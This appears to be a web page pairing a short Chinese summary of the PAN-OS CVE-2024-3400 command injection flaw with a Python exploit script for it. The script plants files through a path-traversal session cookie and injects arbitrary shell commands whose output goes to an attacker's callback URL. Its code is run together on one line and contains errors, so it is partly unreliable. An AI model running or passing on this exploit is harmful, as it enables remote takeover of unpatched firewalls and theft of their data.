Palo Alto Networks PAN-OS 存在一个命令注入漏洞，攻击者可利用该漏洞在目标系统上执行任意命令。该漏洞影响了 PAN-OS 11.1、11.0 和 10.2 的多个版本。攻击者可通过构造恶意 HTTP 请求，利用漏洞在目标系统上执行任意命令，进而控制系统或获取敏感信息。

😄 该漏洞主要影响 PAN-OS 11.1、11.0 和 10.2 的多个版本，攻击者可通过构造恶意 HTTP 请求，利用漏洞在目标系统上执行任意命令。

😎 攻击者可利用该漏洞在目标系统上执行任意命令，进而控制系统或获取敏感信息。例如，攻击者可以利用该漏洞在目标系统上执行命令，获取敏感信息，例如系统管理员密码或其他机密信息。

😔 该漏洞的利用需要攻击者能够访问目标系统，并构造恶意 HTTP 请求。攻击者可以通过网络钓鱼、网络攻击等方式获取对目标系统的访问权限。

😥 为了防止该漏洞被利用，用户应及时更新 PAN-OS 到最新版本。同时，用户应加强网络安全防护，例如使用防火墙、入侵检测系统等工具，防止攻击者访问目标系统。

😩 该漏洞的发现再次提醒用户，网络安全问题不容忽视，需要及时更新软件版本，加强网络安全防护，才能有效抵御各种网络攻击。

Exploit Title: Palo Alto PAN-OS < v11.1.2-h3 - Command Injection and Arbitrary File Creation# Date: 21 Apr 2024# Exploit Author: Kr0ff# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2024-3400# Software Link: -# Version: PAN-OS 11.1 < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3# PAN-OS 11.0 < 11.0.0-h3, < 11.0.1-h4, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1# PAN-OS 10.2 < 10.2.0-h3, < 10.2.1-h2, < 10.2.2-h5, < 10.2.3-h13, < 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h1# Tested on: Debian# CVE : CVE-2024-3400#!/usr/bin/env python3import systry:import argparseimport requestsexcept ImportError:print("Missing dependencies, either requests or argparse not installed")sys.exit(2)# https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis# https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/def check_vuln(target: str, file: str) -> bool:ret = Falseuri = "/ssl-vpn/hipreport.esp"s = requests.Session()r = ""headers = {"User-Agent" : \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0"Content-Type": "application/x-www-form-urlencoded","Cookie": \f"SESSID=../../../var/appweb/sslvpndocs/global-protect/portal/images/{file}"}headers_noCookie = {"User-Agent" : \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" # Windows 10 Chrome 118.0.0.0}if not "http://" or not "https://" in target:target = "http://" + targettry:r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )except requests.exceptions.Timeout or requests.ConnectionError as e:print(f"Request timed out for \"HTTP\" !{e}")print("Trying with \"HTTPS\"...")target = "https://" + targettry:r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )except requests.exceptions.Timeout or requests.ConnectionError as e:print(f"Request timed out for \"HTTPS\"")sys.exit(1)else:r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )if r.status_code == 200:r = s.get( (target + f"/global-protect/portal/images/{file}"), verify=False, headers=headers_noCookie, timeout=10 )if r.status_code == 403:print("Target vulnerable to CVE-2024-3400")ret = Trueelse:return retreturn retdef cmdexec(target: str, callback_url: str, payload: str) -> bool:ret = Falsep = ""if " " in payload:p = payload.replace(" ", "${IFS)")uri = "/ssl-vpn/hipreport.esp"headers = {"User-Agent" : \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0"Content-Type": "application/x-www-form-urlencoded","Cookie": \f"SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/attack782{callback_url}?r=$({payload})"}s = requests.Session()r = ""if not "http://" or not "https://" in target:target = "http://" + targettry:r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )except requests.exceptions.Timeout or requests.ConnectionError as e:print(f"Request timed out for \"HTTP\" !{e}")print("Trying with \"HTTPS\"...")target = "https://" + targettry:r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )except requests.exceptions.Timeout or requests.ConnectionError as e:print(f"Request timed out for \"HTTPS\"")sys.exit(1)else:r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )if not "Success" in r.text:return retelse:ret = Truereturn ret#Initilize parser for argumentsdef argparser(selection=None):parser = argparse.ArgumentParser( description='CVE-2024-3400 - Palo Alto OS Command Injection' )subparser = parser.add_subparsers( help="Available modules", dest="module")exploit_subp = subparser.add_parser( "exploit", help="Exploit module of script")exploit_subp.add_argument( "-t", "--target",help="Target to send payload to", required=True )exploit_subp.add_argument( "-p", "--payload", help="Payload to send (e.g: whoami)", required=True )exploit_subp.add_argument( "-c", "--callbackurl", help="The callback url such as burp collaborator or similar", required=True )#---------------------------------------check_subp = subparser.add_parser( "check", help="Vulnerability check module of script" )check_subp.add_argument( "-t", "--target", help="Target to check if vulnerable", required=True )check_subp.add_argument( "-f", "--filename", help="Filename of the payload (e.g \"exploitCheck.exp\"", required=True )args = parser.parse_args(selection)args = parser.parse_args(args=None if sys.argv[1:] else ["-h"])if args.module == "exploit":cmdexec(args.target, args.callbackurl, args.payload)if args.module == "check":check_vuln(args.target, args.filename)if name == "main":argparser()print("Finished !")